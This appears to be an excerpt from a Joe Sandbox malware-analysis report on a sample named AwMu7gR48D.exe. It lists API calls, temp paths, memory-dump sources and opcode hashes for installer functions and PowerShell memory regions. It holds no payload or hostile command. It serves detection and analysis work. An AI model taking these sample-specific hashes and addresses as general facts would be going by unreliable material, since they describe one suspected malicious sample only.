                                                                              • API String ID: 1849352358-0
                                                                              • Opcode ID: 764c70fbd70d8432b47cb810857664527778e1a3b62db9879bd3831654477798
                                                                              • Instruction ID: e514ae104980ccf078864521baf36738fde3649283c018ed360e76dc3c34fc32
                                                                              • Opcode Fuzzy Hash: 764c70fbd70d8432b47cb810857664527778e1a3b62db9879bd3831654477798
                                                                              • Instruction Fuzzy Hash: 13F0FFB2A04115BFDB01EBA4DD88DAFBBBCEB44301B044476F605F2191C6749D018B79
                                                                              APIs
                                                                              • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C74
                                                                              • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C8C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Timeout
                                                                              • String ID: !
                                                                              • API String ID: 1777923405-2657877971
                                                                              • Opcode ID: 756893ed4847bb0bd72a5117efa2a57ba430928b3e2712cee879890b773371fc
                                                                              • Instruction ID: 91203bd525acade81736f390ad8a27fd027b74ba1091a33c19100adfebe27d64
                                                                              • Opcode Fuzzy Hash: 756893ed4847bb0bd72a5117efa2a57ba430928b3e2712cee879890b773371fc
                                                                              • Instruction Fuzzy Hash: 6C218E71E44209BEEB159FA5D946AAD7BB0EB84304F14803EF505F61D1DA788A408F28
                                                                              APIs
                                                                                • Part of subcall function 00405F2F: lstrcpynA.KERNEL32(?,?,00000400,0040328D,00422F00,NSIS Error,?,00000006,00000008,0000000A), ref: 00405F3C
                                                                                • Part of subcall function 00405960: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nspE492.tmp,?,004059CC,C:\Users\user\AppData\Local\Temp\nspE492.tmp,C:\Users\user\AppData\Local\Temp\nspE492.tmp,76F93410,?,C:\Users\user\AppData\Local\Temp\,00405717,?,76F93410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040596E
                                                                                • Part of subcall function 00405960: CharNextA.USER32(00000000), ref: 00405973
                                                                                • Part of subcall function 00405960: CharNextA.USER32(00000000), ref: 00405987
                                                                              • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nspE492.tmp,00000000,C:\Users\user\AppData\Local\Temp\nspE492.tmp,C:\Users\user\AppData\Local\Temp\nspE492.tmp,76F93410,?,C:\Users\user\AppData\Local\Temp\,00405717,?,76F93410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405A08
                                                                              • GetFileAttributesA.KERNEL32(C:\Users\user\AppData\Local\Temp\nspE492.tmp,C:\Users\user\AppData\Local\Temp\nspE492.tmp,C:\Users\user\AppData\Local\Temp\nspE492.tmp,C:\Users\user\AppData\Local\Temp\nspE492.tmp,C:\Users\user\AppData\Local\Temp\nspE492.tmp,C:\Users\user\AppData\Local\Temp\nspE492.tmp,00000000,C:\Users\user\AppData\Local\Temp\nspE492.tmp,C:\Users\user\AppData\Local\Temp\nspE492.tmp,76F93410,?,C:\Users\user\AppData\Local\Temp\,00405717,?,76F93410,C:\Users\user\AppData\Local\Temp\), ref: 00405A18
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd
                                                                              Similarity
                                                                              • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                              • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nspE492.tmp
                                                                              • API String ID: 3248276644-629276157
                                                                              • Opcode ID: 1798501a893aa51cf33724b967df125bb5b79cc73e901e6a487cbcc52799f4ac
                                                                              • Instruction ID: 1994e1ad2c5e9883225bba15f0e05bd5e2410f9dbe362fa4db8952c1f9a8588a
                                                                              • Opcode Fuzzy Hash: 1798501a893aa51cf33724b967df125bb5b79cc73e901e6a487cbcc52799f4ac
                                                                              • Instruction Fuzzy Hash: B3F04CB6205D5296C622333A1C066EF2A55CE86334719463FF891B13D2DB3C8913DD7E
                                                                              APIs
                                                                              • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004031A8,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004033CF,?,00000006,00000008,0000000A), ref: 004058CD
                                                                              • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004031A8,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004033CF,?,00000006,00000008,0000000A), ref: 004058D6
                                                                              • lstrcatA.KERNEL32(?,00409014,?,00000006,00000008,0000000A), ref: 004058E7
                                                                              Strings
                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 004058C7
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd
                                                                              Similarity
                                                                              • API ID: CharPrevlstrcatlstrlen
                                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                                              • API String ID: 2659869361-297319885
                                                                              • Opcode ID: 7d86c92969947f3077f9a158046bd063bc506289d00538d24d19a3cace2b88b5
                                                                              • Instruction ID: 8ecb161afe92f8f98ec5c140421c9a6f3833b5d00e23c8f539a5f8bbe46d8a58
                                                                              • Opcode Fuzzy Hash: 7d86c92969947f3077f9a158046bd063bc506289d00538d24d19a3cace2b88b5
                                                                              • Instruction Fuzzy Hash: B0D0A962A05D302BD20273159C05E8F2A0CCF12740B0400B2F200B22E2C63C4D428FFE
                                                                              APIs
                                                                              • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402C19
                                                                              • RegCloseKey.ADVAPI32(?), ref: 00402C22
                                                                              • RegCloseKey.ADVAPI32(?), ref: 00402C43
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd
                                                                              Similarity
                                                                              • API ID: Close$Enum
                                                                              • String ID:
                                                                              • API String ID: 464197530-0
                                                                              • Opcode ID: 92a6906e664bbcb47ab1ca28fdd4f13aa4067a21e5a0486ffc58b8f5881c376e
                                                                              • Instruction ID: 05bed6b59ed8188e40eca3efb14264cb36eb805b2849730c7d7757a09cb5f5a9
                                                                              • Opcode Fuzzy Hash: 92a6906e664bbcb47ab1ca28fdd4f13aa4067a21e5a0486ffc58b8f5881c376e
                                                                              • Instruction Fuzzy Hash: BC115B32504119FBEF01AF51CE09B9E7B7AEF14351F104072BA05B50E0E7B5EE52AA68
                                                                              APIs
                                                                              • CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nspE492.tmp,?,004059CC,C:\Users\user\AppData\Local\Temp\nspE492.tmp,C:\Users\user\AppData\Local\Temp\nspE492.tmp,76F93410,?,C:\Users\user\AppData\Local\Temp\,00405717,?,76F93410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040596E
                                                                              • CharNextA.USER32(00000000), ref: 00405973
                                                                              • CharNextA.USER32(00000000), ref: 00405987
                                                                              Strings
                                                                              • C:\Users\user\AppData\Local\Temp\nspE492.tmp, xrefs: 00405961
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd
                                                                              Similarity
                                                                              • API ID: CharNext
                                                                              • String ID: C:\Users\user\AppData\Local\Temp\nspE492.tmp
                                                                              • API String ID: 3213498283-2162577230
                                                                              • Opcode ID: 78caeea6086e6eed9a212387893711d8897386d9b52ffe3bd3d136e2934aa6d1
                                                                              • Instruction ID: 9bd73c2178bbc4ada55c293d8cea80d9ef0b2d457d60247f238fee92507865f8
                                                                              • Opcode Fuzzy Hash: 78caeea6086e6eed9a212387893711d8897386d9b52ffe3bd3d136e2934aa6d1
                                                                              • Instruction Fuzzy Hash: CDF096D1904F60AEFB3252684C44B779F89CB56771F18447BE940B62C1C27C48418FEB
                                                                              APIs
                                                                              • DestroyWindow.USER32(00000000,00000000,00402EC4,00000001), ref: 00402CF7
                                                                              • GetTickCount.KERNEL32 ref: 00402D15
                                                                              • CreateDialogParamA.USER32(0000006F,00000000,00402C61,00000000), ref: 00402D32
                                                                              • ShowWindow.USER32(00000000,00000005), ref: 00402D40
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd
                                                                              Similarity
                                                                              • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                              • String ID:
                                                                              • API String ID: 2102729457-0
                                                                              • Opcode ID: f4337ae7c9a0c2b393fe5f11cb57febad8f5df9eb2ad2e71e21657c922240b80
                                                                              • Instruction ID: 46e63a0393c595c386a212d898ebec3da19c13aa57c3e66a4565427f31a4a510
                                                                              • Opcode Fuzzy Hash: f4337ae7c9a0c2b393fe5f11cb57febad8f5df9eb2ad2e71e21657c922240b80
                                                                              • Instruction Fuzzy Hash: 09F05E70906221ABDA207F20BE4CACA7BA4FB45B527024576F445B11E4C779888ACBDD
                                                                              APIs
                                                                              • IsWindowVisible.USER32(?), ref: 00404FF9
                                                                              • CallWindowProcA.USER32(?,?,?,?), ref: 0040504A
                                                                                • Part of subcall function 0040403C: SendMessageA.USER32(000103FE,00000000,00000000,00000000), ref: 0040404E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd
                                                                              Similarity
                                                                              • API ID: Window$CallMessageProcSendVisible
                                                                              • String ID:
                                                                              • API String ID: 3748168415-3916222277
                                                                              • Opcode ID: e712e2a543f08d2e54f60ba561f502afcf318598cb166087ec4cd0ddecdd3944
                                                                              • Instruction ID: a223dd13e6372a4dd0479c59c93eb21e0d8a99a0ac54a5c20384062b78d82a0f
                                                                              • Opcode Fuzzy Hash: e712e2a543f08d2e54f60ba561f502afcf318598cb166087ec4cd0ddecdd3944
                                                                              • Instruction Fuzzy Hash: F1017171104609EBEF205F51DD81A9F3A29EB84795F204037FA01B62D1D77A8C51AAAE
                                                                              APIs
                                                                              • FreeLibrary.KERNEL32(?,76F93410,00000000,C:\Users\user\AppData\Local\Temp\,004036C2,004034DC,?,?,00000006,00000008,0000000A), ref: 00403704
                                                                              • GlobalFree.KERNEL32(00000000), ref: 0040370B
                                                                              Strings
                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 004036EA
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd
                                                                              Similarity
                                                                              • API ID: Free$GlobalLibrary
                                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                                              • API String ID: 1100898210-297319885
                                                                              • Opcode ID: 35d1f02da0abf4a3a5ea65bd0cdd12c9264502c99e7b9c945f64e5a7c8fdc6a2
                                                                              • Instruction ID: b677e6ccb62fb367f72670c3ce7c034f3dd0af87a7da7d41c05298a088c6e355
                                                                              • Opcode Fuzzy Hash: 35d1f02da0abf4a3a5ea65bd0cdd12c9264502c99e7b9c945f64e5a7c8fdc6a2
                                                                              • Instruction Fuzzy Hash: C6E01233815121ABC7356F5BED04B5A77687F45B22F058466EC407B3A0CB746C418FD9
                                                                              APIs
                                                                              • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402DB4,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\AwMu7gR48D.exe,C:\Users\user\Desktop\AwMu7gR48D.exe,80000000,00000003), ref: 00405914
                                                                              • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402DB4,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\AwMu7gR48D.exe,C:\Users\user\Desktop\AwMu7gR48D.exe,80000000,00000003), ref: 00405922
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd
                                                                              Similarity
                                                                              • API ID: CharPrevlstrlen
                                                                              • String ID: C:\Users\user\Desktop
                                                                              • API String ID: 2709904686-2743851969
                                                                              • Opcode ID: 714da30cf500cccbdd7b4a4277d37f3a4e299a669b52a45b343dae58782ad56f
                                                                              • Instruction ID: 79756b3271e31ddeb9bc27b600d1c90533e2d507c88bbc01e3e6e8e0ac64b055
                                                                              • Opcode Fuzzy Hash: 714da30cf500cccbdd7b4a4277d37f3a4e299a669b52a45b343dae58782ad56f
                                                                              • Instruction Fuzzy Hash: 1BD0C7B2419D706EE34373559C04B9F6A49DF56750F0904A2E140A61D1C67C5D414BAD
                                                                              APIs
                                                                              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405C88,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A3D
                                                                              • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405A55
                                                                              • CharNextA.USER32(00000000,?,00000000,00405C88,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A66
                                                                              • lstrlenA.KERNEL32(00000000,?,00000000,00405C88,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A6F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd
                                                                              Similarity
                                                                              • API ID: lstrlen$CharNextlstrcmpi
                                                                              • String ID:
                                                                              • API String ID: 190613189-0
                                                                              • Opcode ID: 57b21f4120e00b08a3941e9ed4e610408d9ca53935617fe6296070accebd3829
                                                                              • Instruction ID: 6224e523b18aba5be362eaca93d7d04149ef311f73b073555fcbd801f46ec3cb
                                                                              • Opcode Fuzzy Hash: 57b21f4120e00b08a3941e9ed4e610408d9ca53935617fe6296070accebd3829
                                                                              • Instruction Fuzzy Hash: 68F0C232604458AFC712DBA4CC40D9EBBA8EF46350B2541A5E800F7251D234EE019FA9
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1856661328.0000000007580000.00000040.00000800.00020000.00000000.sdmp, Offset: 07580000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7580000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 0293d121c224c6267c1abc5db729d273314b35afdc9bf51d3a1184eb62211351
                                                                              • Instruction ID: f099f309eaba7ed2cf9fb82954a56c0f562157e248ba401b551d0d038359851b
                                                                              • Opcode Fuzzy Hash: 0293d121c224c6267c1abc5db729d273314b35afdc9bf51d3a1184eb62211351
                                                                              • Instruction Fuzzy Hash: 69E139B4B00319DFEBA0DB64C944BDAB7B2BB8A304F1081A5D5096F791CA36DD81CF55
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1856661328.0000000007580000.00000040.00000800.00020000.00000000.sdmp, Offset: 07580000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7580000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 3dcd0cf16de3d14f106eddf3b68b96f0e611e84c3acb9a5fac54129ff168b827
                                                                              • Instruction ID: 24babbcd7e6465b9862962294e8eb97ee9fac98af89c06c71c7b3e6777aef381
                                                                              • Opcode Fuzzy Hash: 3dcd0cf16de3d14f106eddf3b68b96f0e611e84c3acb9a5fac54129ff168b827
                                                                              • Instruction Fuzzy Hash: 23A28EB0A00205CFE764DBA4C544BDABBB2BB89718F20C16AD9056F351DB76ED42CF81
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1856661328.0000000007580000.00000040.00000800.00020000.00000000.sdmp, Offset: 07580000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7580000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 3ee5ee4771e4a784aad226f7d2a9635572e128de206420504465ba5d70cd1a33
                                                                              • Instruction ID: 0cdee3795a7dbaea2bee6c5b6694d01f1efa2e4d3969f7d3eeb1406bb13fea98
                                                                              • Opcode Fuzzy Hash: 3ee5ee4771e4a784aad226f7d2a9635572e128de206420504465ba5d70cd1a33
                                                                              • Instruction Fuzzy Hash: 6E82AEB0B00215DFEB50DB58C940BEEBBB2BB89714F14C0AAD909AF351DB75DD428B91
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1856661328.0000000007580000.00000040.00000800.00020000.00000000.sdmp, Offset: 07580000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7580000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b2df335c5c906db814abdf33a8f2e96eaee91904cf1d54e904fdba7b3c490088
                                                                              • Instruction ID: b94b3e9f643cf85090d0ba0946aead2ecccbdcbe29957fb812bd75fb29a7a7ed
                                                                              • Opcode Fuzzy Hash: b2df335c5c906db814abdf33a8f2e96eaee91904cf1d54e904fdba7b3c490088
                                                                              • Instruction Fuzzy Hash: 4D828EB4A10205DFEB20DB64C544BDABBB2FB49309F24856AD9016F352DB76ED42CF81
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1856661328.0000000007580000.00000040.00000800.00020000.00000000.sdmp, Offset: 07580000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7580000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 69bbe95acf4b4bf28ceb9822df3c0e157254452a2837e2410dec50f86c45ed40
                                                                              • Instruction ID: ac2aba493508749a206b6032f88db98e38f1f5bc187ac1e0a7f7dac5af9496fe
                                                                              • Opcode Fuzzy Hash: 69bbe95acf4b4bf28ceb9822df3c0e157254452a2837e2410dec50f86c45ed40
                                                                              • Instruction Fuzzy Hash: 2C528EB0B00215DFE760DB18C940B9AB7B2FB89714F10C099E909AF355DB76ED828F95
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1856661328.0000000007580000.00000040.00000800.00020000.00000000.sdmp, Offset: 07580000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7580000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: bd7741371960231647b18ca7623f226c4c608b8071d5cf0a2c6e3f9571dd5daa
                                                                              • Instruction ID: 5aab4040423e6b329f843d1c02af522930bd4344f7b97a3dedf8fd6a5be0c776
                                                                              • Opcode Fuzzy Hash: bd7741371960231647b18ca7623f226c4c608b8071d5cf0a2c6e3f9571dd5daa
                                                                              • Instruction Fuzzy Hash: A3423DB0B00214DFE764DB58C950BDAB7F2BB8A714F10C195E9096F391CA72ED828F95
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1856661328.0000000007580000.00000040.00000800.00020000.00000000.sdmp, Offset: 07580000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7580000_powershell.jbxd
